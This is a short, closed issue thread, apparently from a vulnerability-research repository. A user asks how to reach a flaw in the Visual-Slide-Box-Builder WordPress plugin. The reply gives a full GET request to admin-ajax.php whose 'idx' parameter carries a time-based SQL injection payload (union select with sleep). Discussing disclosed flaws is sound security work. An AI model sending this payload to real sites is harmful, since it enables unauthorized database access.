Closed Phoenix1112 closed 2 years ago
Hello. Thanks for this project. I don't understand. Is the Visual-Slide-Box-Builder-plugin vulnerability an authorized vulnerability? If an unauthorized user is exploiting this vulnerability, on which page exactly is the "idx" parameter located?
Hello, the URL + parameter:
GET /wordpress/wp-admin/admin-ajax.php?action=vsbb_get_one&idx=1%20union%20select%201,2,3,4,5,sleep(3) HTTP/1.1\n
Thank you for your response, and BR